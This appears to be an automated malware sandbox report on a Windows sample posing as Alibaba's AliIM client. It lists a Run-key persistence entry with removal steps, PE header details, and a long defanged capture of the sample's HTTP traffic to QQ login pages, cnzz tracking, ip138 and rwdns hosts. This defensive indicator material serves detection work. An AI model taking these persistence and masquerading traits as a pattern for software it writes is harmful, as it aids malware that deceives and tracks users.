%Documents and Settings%\%current user%\Cookies\Current_User@120.24.81[2].txt (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\jquery-1.10.2.min_f2fb5194[1].js (3234 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\baidu_jgylogo3[1].gif (705 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RhdmcnkZlr" = "c:\windows\ime\appfht.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Alibaba software (Shanghai) Corporation.
Product Name: AliIM ????
Product Version: 1, 0, 0, 1
Legal Copyright: Alibaba software (Shanghai) Corporation. All rights reserved.
Legal Trademarks:
Original Filename: AliIM.exe
Internal Name: TaMengServer
File Version: 1, 0, 0, 1
File Description: AliWangWang
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 49330 | 53248 | 3.99991 | 76009a14b2608ebd528d5e426a71a1f4 |
.rdata | 57344 | 5864 | 8192 | 2.80413 | 1af73592d6735a9e00247cfbd97e81c8 |
.data | 65536 | 5652 | 4096 | 2.69461 | 79b9742b60d27cb1d1e6a1b87ab4b8a5 |
.rsrc | 73728 | 5303804 | 5304320 | 5.537 | 908d2014a591f89f270a206aa081c285 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /app.gif?&cna=tGonDZSqqmQCAbhrJibBL0IA HTTP/1.1
Accept: */*
Referer: hXXp://1.rwdns.com/zztj/yeshe.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: pcookie.cnzz.com
HTTP/1.1 200 OK
Server: Tengine
Date: Sun, 28 Dec 2014 21:57:08 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=tGonDZSqqmQCAbhrJibBL0IA; expires=Wed, 25-Dec-24 21:57:08 GMT; path=/; domain=.cnzz.com
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;..
GET /ptlogin/ver/10107/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:17:08 GMT; length=9168
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:23 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977f24-23d0"
Cache-Control: max-age=600
Expires: Sun, 28 Dec 2014 22:00:45 GMT
Age: 398
Last-Modified: Mon, 22 Dec 2014 02:17:08 GMT
Connection: keep-alive
GET /ptlogin/ver/10107/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:17:08 GMT; length=9168
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:28 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977f24-23d0"
Cache-Control: max-age=600
Expires: Sun, 28 Dec 2014 22:00:45 GMT
Age: 403
Last-Modified: Mon, 22 Dec 2014 02:17:08 GMT
Connection: keep-alive
GET /ptlogin/v4/style/0/images/load.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:57:28 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-303"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 22:00:07 GMT
Age: 7041
Content-Length: 771
Content-Type: image/gif
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GIF89a.....................................wul..y............!..NETSCAPE2.0.....!.......,..........O.......{....Y..`....I.D8.. S.....(.......D..(.I~.. .H`....Z.f....k.N..q...;'.L..!.......,..........N.......{..@.1....Q]AiN.:..)S.T...,........b....$?...Q(0.).j.f....{....n.-~N....!.......,..........M.........,Eeu......%5..E...f3. ......g(..<...L...D".X`.RJ.J.N..........9...=..!.......,..........N...J..Z.'B. ..q`.....P)8./,S&.$.$.......y....D...."..`.R.ak.b.........m..^S....!.......,..........M......Z.gJ.....}.H..I...b$.(.t..}.......~9..@Y,2..........i00......|......t;..!.......,..........M...R..Z..R.. ..}.H..I.l....t.P0....B....v>.CG1.2...i.P....J.0.R-.....J....t;..!.......,..........M......Z..Z..$..}.H..I.l...at..0..........8..B d..L.I.B)...q80...&..t.......3..;..
GET /zztj/yeshe.html HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 1.rwdns.com
Connection: Keep-Alive
GET /zztj/yeshe.html HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 1.rwdns.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:46:43 GMT
Server: Microsoft-IIS/6.0
Content-Length: 99
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQQSQSRA=LFMOHFPDLMIBCIOIGBEMBAOK; path=/
Cache-control: private
<script src="hXXp://s6.cnzz.com/stat.php?id=4690803&web_id=4690803" language="JavaScript"></script>..
GET / HTTP/1.1
Host: VVV.baidu.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:56:35 GMT
Content-Type: text/html
Content-Length: 14613
Last-Modified: Wed, 03 Sep 2014 02:48:32 GMT
Connection: Keep-Alive
Vary: Accept-Encoding
Set-Cookie: BAIDUID=E130BBF5D4750DB2D958417BF0FEDBE0:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BAIDUPSID=E130BBF5D4750DB2D958417BF0FEDBE0; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BDSVRTM=0; path=/
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Server: BWS/1.1
Pragma: no-cache
Cache-control: no-cache
BDPAGETYPE: 1
BDQID: 0xd4fd7e9a0010ad88
BDUSERID: 0
Accept-Ranges: bytes
<!DOCTYPE html><!--STATUS OK-->..<html>..<head>...<meta http-equiv="content-type" content="text/html;charset=utf-8">...<meta http-equiv="X-UA-Compatible" content="IE=Edge">...<link rel="dns-prefetch" href="//s1.bdstatic.com"/>...<link rel="dns-prefetch" href="//t1.baidu.com"/>...<link rel="dns-prefetch" href="//t2.baidu.com"/>...<link rel="dns-prefetch" href="//t3.baidu.com"/>...<link rel="dns-prefetch" href="//t10.baidu.com"/>...<link rel="dns-prefetch" href="//t11.baidu.com"/>...<link rel="dns-prefetch" href="//t12.baidu.com"/>...<link rel="dns-prefetch" href="//b1.bdstatic.com"/>...<title>...........................</title>...<link href="hXXp://s1.bdstatic.com/r/www/cache/static/home/css/index.css" rel="stylesheet" type="text/css" />...<!--[if lte IE 8]><style index="index" >#content{height:480px\9}#m{top:260px\9}</style><![endif]-->...<!--[if IE 8]><style index="index" >#u1 a.mnav,#u1 a.mnav:visited{font-family:simsun}</style><![endif]-->...<script>var hashMatch = document.location.href.match(/#+(.*wd=[^&]+)/);if (hashMatch && hashMatch[0] && hashMatch[1]) {document.location.replace("hXXp://"+location.host+"/s?"+hashMatch[1]);}var ns_c = function(){};</script>...<script>function h(obj){obj.style.behavior='url(#default#homepage)';var a = obj.setHomePage('//VVV.baidu.com/');}</script>...<noscript><meta http-equiv="refresh" conte
<<< skipped >>>
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:16:01 GMT
If-None-Match: "54977ee1-1eb0"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:28 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-1eb0"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 23:27:57 GMT
Age: 1771
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GET /stat.htm?id=4690803&r=&lg=en-us&ntime=none&cnzz_eid=1807063244-1419803827-&showp=1024x768&t=&h=1&rnd=1176270916 HTTP/1.1
Accept: */*
Referer: hXXp://1.rwdns.com/zztj/yeshe.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hzs9.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Sun, 28 Dec 2014 21:57:08 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Tue, 28 May 2013 02:57:17 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..
GET /ptlogin/ver/10107/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:56:45 GMT
Server: PWS/8.1.20.9
X-Px: ms h0-s2078.p9-jfk ( h0-s2071.p9-jfk), ht h0-s2071.p9-jfk.cdngp.net
ETag: "54977f24-23d0"
Cache-Control: max-age=600
Expires: Sun, 28 Dec 2014 22:00:45 GMT
Age: 360
Content-Length: 3528
Content-Type: application/x-javascript
Content-Encoding: gzip
Vary: Accept-Encoding
Px-Uncompress-Origin: 9168
Last-Modified: Mon, 22 Dec 2014 02:17:08 GMT
Connection: keep-alive
6.E....)..<n_.?.!......R...Jy./.n......?.. .>uG. .>...;/.l..'.L.......tn?[....X.0..o1k$..BE....g..k.*.nu.F........x.E....................m....2A3O_.|k.3.;.2dKbTW..{.Nn..o..xeL.![ .(.k.9..l.......4....X.....*.U...H....T0...I...(. .)....8R;..[{[.g.Z...$gV....Hf`j.X..E.J!.riK.ET"XR...0G...r(..HR..m...Y.........DY...d ...[..q.nQ.V....<L.lZ...V..o..^...d.4.3..c.97...g.7....C.l.A....A..2mW.f@k.f`'....`[mb.t..............a..........)...;.7....X........T$.EU...e.(2.} .n ........Uk>..^UQ.cx&..l..\U....,I...Z<.&3. .,R....e".r...`.._."c.....TLu.<>...h......?.......R>.g.....}..O...I_....&..e..L!)N.]-sL....#K..#.............Y.S.H.. f6gKkG.q .6.E.!..`...U,..Ic[ KB........^.6w..bMO.g.1.t..Y..^.4...|.y..A...l......................6...p.^6l.....F.^..K.....V.Y....K....e. ...G.1.{OM...6..._...M....$.9R..`{....'.....7..U....%.bm.q....QJ..d..Q2.2?..?\N.p...^..?........xi..(..{.....Z)OR...9..F....K..Zx.>~.xrIX...d..Qz.$!..6.inM'.,...........V.R.Z!0...>.....).E..m...<U.|.;t.,....`...8g...4j.......^.....[....>.....?zS....=1..\/.|.@..&.!..#....R.Kx:.3.YjT..y..Ga...illnm...:=......z=.I...;..'.... .4`.3...w.....a...`g...K.Yq...a.O......b......o'gG..`.b09..>.:9...n....'.............7..n....O'...t.4w|zD.GZ..0..E.`(8g.06<..y;...`..G^...........W"V...2...#..Rf...O..?=.ou.......N=..pxR'.W..#^.........DQ. .HP..^...t.n.....x..;.g\...W.|9.Ia...u.....q."...O.....l...N..1{P..1...dW I.`C7.&>....E.!O0....;D......s.6.:.V.j.}......PF.X(V1.`.t..g.....?..A..3.~.?...<.S .l...fF.....,....#f..S`...,8.pJH.
<<< skipped >>>
GET /ptlogin/ver/10107/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:17:08 GMT; length=9168
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:56:52 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977f24-23d0"
Cache-Control: max-age=600
Expires: Sun, 28 Dec 2014 22:00:45 GMT
Age: 367
Last-Modified: Mon, 22 Dec 2014 02:17:08 GMT
Connection: keep-alive
GET /ptlogin/ver/10107/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:17:08 GMT; length=9168
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:56:57 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977f24-23d0"
Cache-Control: max-age=600
Expires: Sun, 28 Dec 2014 22:00:45 GMT
Age: 372
Last-Modified: Mon, 22 Dec 2014 02:17:08 GMT
Connection: keep-alive
GET /ptlogin/v4/style/0/images/load.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:56:57 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-303"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 22:00:06 GMT
Age: 7011
Content-Length: 771
Content-Type: image/gif
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GIF89a.....................................wul..y............!..NETSCAPE2.0.....!.......,..........O.......{....Y..`....I.D8.. S.....(.......D..(.I~.. .H`....Z.f....k.N..q...;'.L..!.......,..........N.......{..@.1....Q]AiN.:..)S.T...,........b....$?...Q(0.).j.f....{....n.-~N....!.......,..........M.........,Eeu......%5..E...f3. ......g(..<...L...D".X`.RJ.J.N..........9...=..!.......,..........N...J..Z.'B. ..q`.....P)8./,S&.$.$.......y....D...."..`.R.ak.b.........m..^S....!.......,..........M......Z.gJ.....}.H..I...b$.(.t..}.......~9..@Y,2..........i00......|......t;..!.......,..........M...R..Z..R.. ..}.H..I.l....t.P0....B....v>.CG1.2...i.P....J.0.R-.....J....t;..!.......,..........M......Z..Z..$..}.H..I.l...at..0..........8..B d..L.I.B)...q80...&..t.......3..;..
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:16:01 GMT
If-None-Match: "54977ee1-1eb0"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:17 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-1eb0"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 23:27:56 GMT
Age: 1761
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:16:01 GMT
If-None-Match: "54977ee1-1eb0"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:23 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-1eb0"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 23:27:57 GMT
Age: 1766
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GET /ptlogin/v4/style/0/images/load.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:57:23 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-303"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 22:00:07 GMT
Age: 7036
Content-Length: 771
Content-Type: image/gif
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GIF89a.....................................wul..y............!..NETSCAPE2.0.....!.......,..........O.......{....Y..`....I.D8.. S.....(.......D..(.I~.. .H`....Z.f....k.N..q...;'.L..!.......,..........N.......{..@.1....Q]AiN.:..)S.T...,........b....$?...Q(0.).j.f....{....n.-~N....!.......,..........M.........,Eeu......%5..E...f3. ......g(..<...L...D".X`.RJ.J.N..........9...=..!.......,..........N...J..Z.'B. ..q`.....P)8./,S&.$.$.......y....D...."..`.R.ak.b.........m..^S....!.......,..........M......Z.gJ.....}.H..I...b$.(.t..}.......~9..@Y,2..........i00......|......t;..!.......,..........M...R..Z..R.. ..}.H..I.l....t.P0....B....v>.CG1.2...i.P....J.0.R-.....J....t;..!.......,..........M......Z..Z..$..}.H..I.l...at..0..........8..B d..L.I.B)...q80...&..t.......3..;..
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: VVV.ip138.com
<<< skipped >>>
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:16:01 GMT
If-None-Match: "54977ee1-1eb0"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:02 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-1eb0"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 23:27:56 GMT
Age: 1746
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GET /ptlogin/ver/10107/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:17:08 GMT; length=9168
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:07 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977f24-23d0"
Cache-Control: max-age=600
Expires: Sun, 28 Dec 2014 22:00:45 GMT
Age: 382
Last-Modified: Mon, 22 Dec 2014 02:17:08 GMT
Connection: keep-alive
GET /ptlogin/ver/10107/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:17:08 GMT; length=9168
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:12 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977f24-23d0"
Cache-Control: max-age=600
Expires: Sun, 28 Dec 2014 22:00:44 GMT
Age: 388
Last-Modified: Mon, 22 Dec 2014 02:17:08 GMT
Connection: keep-alive
GET /ptlogin/v4/style/0/images/load.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:57:12 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-303"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 22:00:06 GMT
Age: 7026
Content-Length: 771
Content-Type: image/gif
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GIF89a.....................................wul..y............!..NETSCAPE2.0.....!.......,..........O.......{....Y..`....I.D8.. S.....(.......D..(.I~.. .H`....Z.f....k.N..q...;'.L..!.......,..........N.......{..@.1....Q]AiN.:..)S.T...,........b....$?...Q(0.).j.f....{....n.-~N....!.......,..........M.........,Eeu......%5..E...f3. ......g(..<...L...D".X`.RJ.J.N..........9...=..!.......,..........N...J..Z.'B. ..q`.....P)8./,S&.$.$.......y....D...."..`.R.ak.b.........m..^S....!.......,..........M......Z.gJ.....}.H..I...b$.(.t..}.......~9..@Y,2..........i00......|......t;..!.......,..........M...R..Z..R.. ..}.H..I.l....t.P0....B....v>.CG1.2...i.P....J.0.R-.....J....t;..!.......,..........M......Z..Z..$..}.H..I.l...at..0..........8..B d..L.I.B)...q80...&..t.......3..;..
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:16:01 GMT
If-None-Match: "54977ee1-1eb0"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:56:57 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-1eb0"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 23:27:56 GMT
Age: 1741
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GET /ptlogin/ver/10107/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:17:08 GMT; length=9168
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:02 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977f24-23d0"
Cache-Control: max-age=600
Expires: Sun, 28 Dec 2014 22:00:45 GMT
Age: 377
Last-Modified: Mon, 22 Dec 2014 02:17:08 GMT
Connection: keep-alive
GET /ptlogin/v4/style/0/images/load.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:57:02 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-303"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 22:00:06 GMT
Age: 7016
Content-Length: 771
Content-Type: image/gif
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GIF89a.....................................wul..y............!..NETSCAPE2.0.....!.......,..........O.......{....Y..`....I.D8.. S.....(.......D..(.I~.. .H`....Z.f....k.N..q...;'.L..!.......,..........N.......{..@.1....Q]AiN.:..)S.T...,........b....$?...Q(0.).j.f....{....n.-~N....!.......,..........M.........,Eeu......%5..E...f3. ......g(..<...L...D".X`.RJ.J.N..........9...=..!.......,..........N...J..Z.'B. ..q`.....P)8./,S&.$.$.......y....D...."..`.R.ak.b.........m..^S....!.......,..........M......Z.gJ.....}.H..I...b$.(.t..}.......~9..@Y,2..........i00......|......t;..!.......,..........M...R..Z..R.. ..}.H..I.l....t.P0....B....v>.CG1.2...i.P....J.0.R-.....J....t;..!.......,..........M......Z..Z..$..}.H..I.l...at..0..........8..B d..L.I.B)...q80...&..t.......3..;..
GET /cgi-bin/qlogin HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
